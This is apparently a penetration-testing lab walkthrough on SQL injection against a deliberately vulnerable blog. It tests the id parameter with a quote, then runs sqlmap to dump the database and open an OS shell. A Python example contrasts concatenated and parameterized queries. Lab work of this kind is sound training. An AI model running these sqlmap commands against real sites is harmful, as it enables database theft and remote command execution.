SQL Injection [SQLi]

 

Reference: SQL Injection Authentication Bypass Cheat Sheet

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

 

1. Browse the PentesterLab vulnerable blog website through Firefox.


 

2. Edit the cookie value using the Cookie Manager tool, and save it.

3. Then click the 'Admin' button to enter the administration page.


4. Look at the URL format; from it we guess the DBMS may be MySQL.


5. Change the id value to a single quote ( ' ) and press Enter to see how the page responds.


 

6. Use sqlmap for the injection operations:

sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1


sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 --dump


sqlmap -u "http://10.0.0.21/admin/edit.php?id=1" --cookie=PHPSESSID=q5sm3kj7suae5uam1gmbh47kr1 --os-shell
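
Why the single quote in step 5 breaks the page, and how the id parameter should be handled instead. This is an added example, not code from the vulnerable blog: the table, the handler names and the use of SQLite in place of MySQL are assumptions made so it runs offline.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the blog's database (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Draft")])
    return db

def edit_vulnerable(db, raw_id):
    """Hypothetical 'before': the id parameter is pasted into the SQL text,
    so a lone quote reaches the parser and surfaces as a database error."""
    query = "SELECT id, title FROM posts WHERE id=" + raw_id
    return db.execute(query).fetchall()

def edit_hardened(db, raw_id):
    """'After': check the value is a plain ASCII integer, then bind it.
    The bound value is data only and never becomes part of the SQL text."""
    # str.isdigit() accepts characters such as '²', so match ASCII digits.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be an integer")
    return db.execute("SELECT id, title FROM posts WHERE id=?",
                      (int(raw_id),)).fetchall()

def probe(handler, raw_id):
    """Return ('ok', rows), ('sql_error', msg) or ('rejected', msg)."""
    db = make_db()
    try:
        return ("ok", handler(db, raw_id))
    except sqlite3.Error as exc:
        # In a real handler, log this server-side and show a generic page;
        # echoing the DBMS error is what confirms the flaw to a tester.
        return ("sql_error", str(exc))
    except ValueError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    for value in ("1", "'", "²"):
        print(repr(value), "vulnerable:", probe(edit_vulnerable, value)[0],
              "| hardened:", probe(edit_hardened, value)[0])
```

The same two changes apply to the PHP page: bind the id through a prepared statement and return a generic error instead of the database message.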


 
